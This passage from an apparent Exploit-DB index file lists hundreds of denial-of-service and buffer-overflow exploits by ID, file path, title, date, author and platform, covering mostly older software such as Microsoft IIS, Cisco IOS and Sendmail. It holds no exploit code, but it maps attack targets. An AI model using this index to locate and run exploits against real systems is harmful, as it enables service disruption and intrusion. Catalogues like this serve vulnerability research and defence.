/ Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)",2012-08-13,kingcope,linux,dos, -20484,exploits/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow",1997-01-06,"Solar Designer",windows,dos, -20487,exploits/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos, -20494,exploits/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos, -20508,exploits/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service",1999-04-27,"Simon Helson",windows,dos, -20509,exploits/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos, -20515,exploits/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service)",2000-12-13,"Ilia Sprite",windows,dos, -20518,exploits/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",windows,dos, -20531,exploits/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos, -20532,exploits/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos, -20534,exploits/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos, -20535,exploits/linux/dos/20535.txt,"ReiserFS 3.5.28 (Linux Kernel) - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos, -20536,exploits/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos, -20705,exploits/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos, -20552,exploits/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos, -20558,exploits/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos, -20561,exploits/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (1)",1997-06-12,"Frank DENIS",linux,dos, -20562,exploits/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (2)",1997-06-12,"Wietse Venema",linux,dos, -20564,exploits/windows/dos/20564.txt,"Microsoft Windows NT 4.0 - SNMP-WINS Denial of Service",1997-10-07,CRouland,windows,dos, -20566,exploits/linux/dos/20566.c,"Linux Kernel 2.1.89/2.2.x - Zero-Length Fragment",1997-12-08,"John McDonald",linux,dos, -20613,exploits/windows/dos/20613.txt,"Microsoft Windows 98/2000 - UDP Socket Denial of Service",2001-02-06,"Georgi Guninski",windows,dos, -20644,exploits/hardware/dos/20644.c,"Marconi ASX-1000 - Administration Denial of Service",2001-02-19,"J.K. Garvey",hardware,dos, -20589,exploits/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service",2001-01-21,grazer,windows,dos, -20596,exploits/windows/dos/20596.c,"Microsoft Windows NT 4.0 - Networking Mutex Denial of Service",2001-01-24,"Arne Vidstrom",windows,dos, -20610,exploits/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - Denial of Service",2000-10-31,"Allaire Security",multiple,dos, -20634,exploits/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow",2001-02-15,joetesta,windows,dos, -20641,exploits/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 - Denial of Service",2001-02-20,"SNS Research",windows,dos, -20650,exploits/windows/dos/20650.txt,"Sapio WebReflex 1.55 - GET Denial of Service",2001-02-27,slipy,windows,dos, -20654,exploits/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos, -20655,exploits/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos, -20656,exploits/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos, -20659,exploits/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos, -20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,windows,dos, -20664,exploits/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos, -20681,exploits/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos, -20682,exploits/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos, -20696,exploits/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x - IMAP Denial of Service",2001-03-23,nitr0s,windows,dos, -20728,exploits/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos, -20734,exploits/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos, -20735,exploits/sco/dos/20735.txt,"SCO OpenServer 5.0.6 - lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos, -20736,exploits/sco/dos/20736.txt,"SCO Open Server 5.0.6 - lpforms Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos, -20737,exploits/sco/dos/20737.txt,"SCO Open Server 5.0.6 - lpshut Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos, -20739,exploits/sco/dos/20739.txt,"SCO Open Server 5.0.6 - lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos, -20742,exploits/sco/dos/20742.txt,"SCO Open Server 5.0.6 - recon Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos, -20747,exploits/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos, -20750,exploits/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",linux,dos, -20753,exploits/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",cgi,dos, -20763,exploits/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",windows,dos, -20770,exploits/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos, -20771,exploits/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,windows,dos, -20779,exploits/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,windows,dos, -20783,exploits/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,windows,dos, -20784,exploits/windows/dos/20784.cpp,"Wireshark 1.6.0/1.8.2 - Buffer Overflow (PoC)",2012-08-24,X-h4ck,windows,dos, -20792,exploits/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos, -20802,exploits/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos, -20810,exploits/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos, -20811,exploits/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos, -20812,exploits/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos, -20813,exploits/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos, -20814,exploits/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos, -20821,exploits/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos, -20824,exploits/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - '5.2'XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos, -20827,exploits/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos, -20828,exploits/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service Vulnerabilities",2001-05-07,nemesystm,windows,dos, -20830,exploits/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name Denial of Service",2001-05-07,neme-dhc,windows,dos, -20834,exploits/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos, -20844,exploits/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote Denial of Service",2001-05-10,"Jass Seljamaa",osx,dos, -20845,exploits/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote Denial of Service",2001-05-15,"Jass Seljamaa",osx,dos, -20846,exploits/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)",2000-05-14,"Nelson Bunker",windows,dos, -20847,exploits/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos, -20852,exploits/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos, -20853,exploits/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos, -20854,exploits/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos, -20870,exploits/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos, -20883,exploits/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos, -20904,exploits/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos, -20907,exploits/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos, -20917,exploits/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,windows,dos, -20955,exploits/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos, -20922,exploits/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos, -20930,exploits/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos, -20946,exploits/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,Cartel,windows,dos, -20949,exploits/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",windows,dos, -20952,exploits/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",linux,dos, -20957,exploits/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,windows,dos, -20971,exploits/windows/dos/20971.txt,"Adobe Photoshop CS6 - '.png' Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos, -20973,exploits/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service",2001-06-26,gollum,multiple,dos, -20989,exploits/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 - Device File Local Denial of Service",2001-07-04,VIPER_SV,windows,dos, -20991,exploits/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 - Device File Remote Denial of Service",2001-07-04,VIPER_SV,windows,dos, -20997,exploits/multiple/dos/20997.c,"HP-UX 11 / Linux Kernel 2.4 / Windows 2000/NT 4.0 / IRIX 6.5 - Small TCP MSS Denial of Service",2001-07-07,"Darren Reed",multiple,dos, -21006,exploits/windows/dos/21006.txt,"MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos, -21012,exploits/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos, -40421,exploits/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos, -21016,exploits/windows/dos/21016.c,"ID Software Quake 3 - 'SMURF' Denial of Service",2001-07-17,"Andy Gavin",windows,dos, -21028,exploits/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos, -40420,exploits/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos, -21040,exploits/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos, -21042,exploits/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 - Buffer Overflow",2001-07-29,Coolest,multiple,dos, -21047,exploits/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL Denial of Service",2001-08-03,hypoclear,windows,dos, -21048,exploits/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,cgi,dos, -21074,exploits/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos, -21077,exploits/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,bsd,dos, -21092,exploits/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",hardware,dos, -40419,exploits/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos, -21099,exploits/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos, -21103,exploits/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos, -21122,exploits/linux/dos/21122.sh,"Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos, -21123,exploits/windows/dos/21123.txt,"Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos, -21126,exploits/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos, -21131,exploits/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos, -21147,exploits/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos, -21141,exploits/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos, -21143,exploits/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos, -21162,exploits/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (1)",2001-11-29,"Alex Hernandez",windows,dos, -21163,exploits/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (2)",2001-11-29,"Alex Hernandez",windows,dos, -21167,exploits/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",openbsd,dos, -21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos, -21171,exploits/windows/dos/21171.c,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",windows,dos, -21172,exploits/windows/dos/21172.pl,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (2)",2001-12-07,"Nelson Brito",windows,dos, -21174,exploits/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service",2001-12-10,jimmers,windows,dos, -21175,exploits/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,windows,dos, -21177,exploits/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",windows,dos, -40757,exploits/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 - MSHTML CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,windows,dos, -21181,exploits/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",multiple,dos, -21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,linux,dos, -21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos, -21224,exploits/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos, -21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos, -21232,exploits/multiple/dos/21232.c,"Oracle 8i - dbsnmp Command Remote Denial of Service",2002-01-17,benjurry,multiple,dos, -21234,exploits/osx/dos/21234.sh,"Netopia Timbuktu Pro for Macintosh 6.0.1 - Denial of Service",2002-01-18,"Tekno pHReak",osx,dos, -21236,exploits/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos, -21237,exploits/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos, -21240,exploits/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos, -21245,exploits/windows/dos/21245.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos, -21246,exploits/windows/dos/21246.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos, -21261,exploits/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos, -21262,exploits/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos, -21275,exploits/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos, -21293,exploits/windows/dos/21293.pl,"Phusion WebServer 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos, -21296,exploits/hardware/dos/21296.c,"Cisco IOS 11/12 - SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos, -21305,exploits/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",windows,dos, -21306,exploits/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service",2002-02-27,"Limpid Byte",windows,dos, -21307,exploits/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service",2002-02-27,3APA3A,windows,dos, -21326,exploits/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 - Integer Overflow",2012-09-17,"Francis Provencher",windows,dos, -21333,exploits/windows/dos/21333.txt,"AOL Instant Messenger 4.x - Hyperlink Denial of Service",2002-03-01,"NtWaK0 & Recon",windows,dos, -21336,exploits/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities",2002-03-08,"Alex Hernandez",windows,dos, -21337,exploits/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",multiple,dos, -21338,exploits/linux/dos/21338.pl,"XTux Server 2001.0 6.01 - Garbage Denial of Service",2002-03-09,b0iler,linux,dos, -21345,exploits/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",unix,dos, -21346,exploits/windows/dos/21346.html,"Microsoft Internet Explorer 5/6 / Mozilla 0.8/0.9.x / Opera 5/6 - JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",windows,dos, -21366,exploits/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",windows,dos, -21419,exploits/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos, -21379,exploits/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos, -21387,exploits/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos, -21388,exploits/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos, -21389,exploits/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos, -21404,exploits/windows/dos/21404.html,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos, -21409,exploits/unix/dos/21409.pl,"psyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos, -21413,exploits/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 - HTTP Request Denial of Service",2002-04-19,"Steve Zins",multiple,dos, -21416,exploits/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service",2002-04-24,"Berend-Jan Wever",windows,dos, -21428,exploits/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,php,dos, -21429,exploits/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",windows,dos, -21431,exploits/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos, -21432,exploits/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos, -21465,exploits/hardware/dos/21465.txt,"Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service",2002-05-21,FX,hardware,dos, -21471,exploits/windows/dos/21471.c,"NewAtlanta ServletExec/ISAPI 4.1 JSPServlet - Denial of Service",2002-05-22,"Matt Moore",windows,dos, -21472,exploits/hardware/dos/21472.pl,"Cisco CBOS 2.x - Broadband Operating System TCP/IP Stack Denial of Service",2002-05-23,blackangels,hardware,dos, -21476,exploits/linux/dos/21476.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)",2002-05-24,zillion,linux,dos, -21477,exploits/linux/dos/21477.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)",2002-05-24,zillion,linux,dos, -21481,exploits/windows/dos/21481.txt,"Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos, -21482,exploits/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos, -21498,exploits/windows/dos/21498.c,"Evolvable Shambala Server 4.5 - Web Server Denial of Service",2002-05-31,Shambala,windows,dos, -21508,exploits/windows/dos/21508.py,"SafeNet Sentinel Keys Server - Crash (PoC)",2012-09-24,retset,windows,dos, -21512,exploits/freebsd/dos/21512.txt,"Slurp 1.10 - SysLog Remote Format String",2002-06-04,zillion,freebsd,dos, -21518,exploits/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 - System Oversized Font Denial of Service",2002-06-10,"Tom Vogt",linux,dos, -21523,exploits/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos, -21531,exploits/unix/dos/21531.txt,"Caldera OpenServer 5.0.x - XSCO Color Database File Heap Overflow",2002-06-11,kf,unix,dos, -21534,exploits/linux/dos/21534.jsp,"Apache Tomcat 3/4 - JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",linux,dos, -21536,exploits/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine - Denial of Service",2002-06-12,"Marc Schoenefeld",windows,dos, -21537,exploits/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 - Invite Message Remote Buffer Overflow",2002-06-12,gobbles,linux,dos, -21539,exploits/multiple/dos/21539.c,"Netscape 4.x/6.x / Mozilla 0.9.x - Malformed Email POP3 Denial of Service",2002-06-12,eldre8,multiple,dos, -21540,exploits/windows/dos/21540.txt,"Microsoft SQL Server 2000 - SQLXML Buffer Overflow",2002-06-12,"Matt Moore",windows,dos, -21544,exploits/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos, -21556,exploits/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 - CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos, -21561,exploits/hardware/dos/21561.txt,"ZYXEL Prestige 642R Router - Malformed Packet Denial of Service",2002-07-17,"Kistler Ueli",hardware,dos, -21569,exploits/windows/dos/21569.txt,"Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow",2002-06-19,NGSSoftware,windows,dos, -21572,exploits/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos, -21575,exploits/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos, -21580,exploits/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 - Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos, -21593,exploits/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos, -21594,exploits/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos, -21598,exploits/linux/dos/21598.c,"Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion (Denial of Service)",2002-07-08,"Paul Starzetz",linux,dos, -21600,exploits/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Denial of Service",2002-07-08,"Matthew Murphy",windows,dos, -21612,exploits/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos, -21620,exploits/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos, -21632,exploits/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 - Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",unix,dos, -21634,exploits/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)",2002-07-23,Kyuzo,windows,dos, -21637,exploits/hardware/dos/21637.c,"ZYXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. 